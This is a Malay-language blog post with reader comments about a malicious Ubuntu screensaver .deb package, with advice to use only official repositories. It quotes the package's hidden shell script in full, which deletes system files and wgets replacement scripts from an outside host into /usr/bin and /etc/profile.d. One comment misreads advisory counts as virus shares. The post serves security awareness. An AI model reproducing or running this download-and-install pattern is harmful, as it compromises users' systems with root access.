Saya merupakan seorang pengguna ubuntu linux yang sebab awalnya beralih menggunakan ubuntu kerana masalah virus dan antivirus dalam sistem operasi windows. Namun apabila muncul persoalan ini, saya masih boleh menjamin bahawa sepanjang 3~4 tahun menggunakan ubuntu, saya tidak pernah berhadapan dengan apa-apa masalah virus dalam ubuntu. Tetapi disini saya ingin menarik perhatian pembaca tentang satu peristiwa berikut;
Seorang pengguna ubuntu telah melaporkan satu perkara yang mengemparkan dalam forum ubuntu. Conorsulli mengatakan beliau telah muatturun satu fail DEB screensaver dari Gnome-look dan apabila dipasang, ia tidak menambahkan screensaver baru ke dalam list screensaver. Apabila diperiksa code package tersebut, beliau mendapati salah satu failnya mempunyai sesuatu yang mengejutkan kerana ia tertulis satu bash script seperti berikut;
#!/bin/sh
cd /usr/bin/
rm Auto.bash
sleep 1
wget http://05748.t35.com/Bots/Auto.bash
chmod 777 Auto.bash
echo -----------------
cd /etc/profile.d/
rm gnome.sh
sleep 1
wget http://05748.t35.com/Bots/gnome.sh
chmod 777 gnome.sh
echo -----------------
clear
exit
Saya tidak expert dalam bash script tetapi saya boleh beritahu script ini boleh menjadi apa sahaja yang dimahukan oleh penciptanya. Ia mampu mengantikan beberapa fail dalam folder system /usr/bin/ dan diganti dengan fail yang diciptanya. Apa yang bahaya ialah ia memperolehi keistimewaan root kerana pengguna memasukkan password tersebut ketika cuba memasang package DEB itu tadi.
Secara istilahnya, ancaman seperti diatas dipanggil botnet.
Apa yang perlu dilakukan?
1 - Hanya gunakan repository rasmi atau yang diketahui dan disyorkan sahaja.
2 - Elak software .DEB atau .RPM dari sumber-sumber yang tidak diketahui
Perlukah memakai antivirus?
Tak perlu. Dengan 2 langkah pencegahan diatas, ubuntu linux anda adalah selamat. Ini kerana dalam ubuntu tidak ada fungsi autorun, dan fail apa pun tidak disetkan secara default sebagai executable disamping virus perlu mendapat root password sebelum boleh 'mencederakan' system ubuntu anda.
aku baca dalam majalah linux keluaran uk kata linux sekarang dah ada virus sebab perisian yg dipasang pada linux ada yg menggunakan teknologi cross-platform macam java.boleh gunakan clamAV untuk scan virus dalam linux.
ReplyDeleteoh macam tu erk..kalau kita install gak..apa risiko kita dapat???virus???
ReplyDeletesalam,
ReplyDeleteterima kasih di atas info berguna dari tuan.
btol2..aku pon slalu je guna software cntre..deb package untuk program yg jarang didengari bhye..
ReplyDeletesetahu aku, clamAV adalah anti virus untuk scan virus windows dalam linux since dalam linux takde virus.
ReplyDeletetry
ReplyDelete-rkhunter
-chkrootkit
tapi buang masa je..tiap kali scan mmg xjmpe pape..hehe
agak xslamat..baik elakkan..atau check dlu code dia..dats y open source ni selamat..hehe
ReplyDeletesama2..sebarkan!
ReplyDeletebagus2..hehe
ReplyDeleteF-secure ada keluarkan antivirus untuk Linux..
ReplyDeleteskrip tu delete file Auto.sh & gnome.sh lepas tu ganti dengan fail yg telah modified..
ReplyDeletebijak betul pembuatnya..hehe..
nasib baik aku jarang download screensaver & benda2 alah yg bukan2..
tiada sistem yg betul2 selamat, ia bergantung kepada cara ia digunakan..
:)
tak pelik r. dah agak dah. hacker pro pon gune linux.. tak lme lg ade la tu antivirus khas utk linux..
ReplyDeletekod sumber terbuka, ramai orang yang pantau kod2 tu. so mmg selamat.
ReplyDeleteaku penah tgk ade org buat trojan horse utk linux..
ReplyDeletegambar kat sini..
http://yoyoparty.com/upload/d4.jpg
kalau tgk bash sc atas ni, dia bole wget file..
& ade kemungkinan file trojan utk linux ni boleh di execute dgn root privilege..
so akan ade 'orang luar' boleh ctrl secara remote?
jangan pasang cd/dvd rom.. kerana live cd juga mampu menukar passwrd Linux dalam PC. hehehe.
ReplyDeleteyup kisah ni agak lama tapi elok diperingatkan kembali.
ReplyDeleteaku juga pernah kata bahawa linux sebenarnya memang dah cukup bagus sebab ada root pass dan repo tapi kalau user tak paham apa guna dua benda tu memang bahaya.
install apa2 apps dari mana2 sumber.
masukkan pass root tanpa kira kenapa dan mengapa perlu.
lama-lama mesti ada malware juga di linux. macam mana yang berlaku kepada mac osx.
cuma bezanya mac osx dijangkiti daripada perisian cetak rompak dan linux perisian yang free (cetak rompak pun mungkin berlaku)
kalau macam tu banyak lagi la.. usb pun bahaya gak sebab boleh masukkan livecd dalam tu :p
ReplyDeleteutk OS desktop ke server?
ReplyDeletenice info bro..thanks
ReplyDeleteyup2..sbb 2 aku highlight topik ni kt cni..
ReplyDeletekang derang baru2 ni download software plik2 plak...hehe
yups..betul2..dah boleh boot livecd via usb je..
ReplyDeletesalam tuan empunya melayubuntu ni, bagus mengingatkan kembali kesah virus di linux.. maaf keluar topik sikit, just bg pandangan saya sebgai student yang melihat senario pemakaian OS di pejabat dan di rumah,sektor kerajaan dan non-gov, kebanyakn mereka still memakai windows XP sebanyak 98% klu linux hanye 2 3 orang shaja.. manakal gov hanye memakai linux sebgai server itu pun pakai tender luar untuk jaga site server, pegawai ICT pun ringan sikit keje nye.secara rialiti, linux nye ketahanan 98% dari virus(banyak men terminal ngn kemalasan penduduk malaysia kita untuk tahu dan gune linux tu ape). tapi takpe asalkan kita bergerak dan terus menyebarkan perkara yang baik demi sumber yang halal dan permasalahan yang mendatang seperti virus,lembap,hang,Blue of screen dan sebagainya bg penguna yang tegar menggunakan windows lagi.. hohohoho yang penting cekalkan hati.. ~bakal peniaga sumber terbuka~
ReplyDeleteanother reason linux is not for computer noob. mostly linux user yang aku kenal knows how to operate computer and beberapa orang yang noob computer have to use linux sebab kat tempat kerja dorg guna linux. thankfully admin dorang wise enough to not giving them root access.
ReplyDeletetolong tunjuk sikit........... saye baru nak berjinak jinak dengan benda ne
ReplyDeleteerr..tnjuk ape 2 yer??
ReplyDeletemungkin ni POC je nak tunjuk betapa senang nak sebar virus kat linux ekekeke
ReplyDeleteni nasib baik di kasi bash file, kalau dia compile pastu cilok file tu kat ceruk mana ntah, rasanya ada org perasan tak?
azwan ali...amboi3...haha (suka trademark tu).
ReplyDelete"betapa senang nk sebar virus kat linux"
Maaf, kenyataan saudara jauh terpesong. Kenyataan tu spatutnya ditaip begini, "betapa senang nk sebar virus kat windows". Nape? Saya xkn trangkan secara teknikal krn kipas-susah-mati windows xmau fhm. Lagipun, saya suka prinsipal 'talk is cheap, show me the stats'.
Sehingga 18 Jun 2010, Ubuntu hanya ada 935 security threats berbanding windows trdedah kpd 1694 security threats. Dengan erti kata lain, setiap 100 virus/malware yang wujud, 81 ekor akan menyerang windows manakala hanya 19 menyerang ubuntu. kalu btul la virus sng nk masuk linux, pnah x saudara azwan trbaca artikel,howto,tips,forum atau sebagainya ttg cara2 nk remove virus linux, sy ulang, virus linux.
Rnung2kan dan slamat beramal...ᴖ_ᴖ
sumber:
1) http://secunia.com/advisories/search/?search=ubuntu
2) http://secunia.com/advisories/search/?search=%22windows%22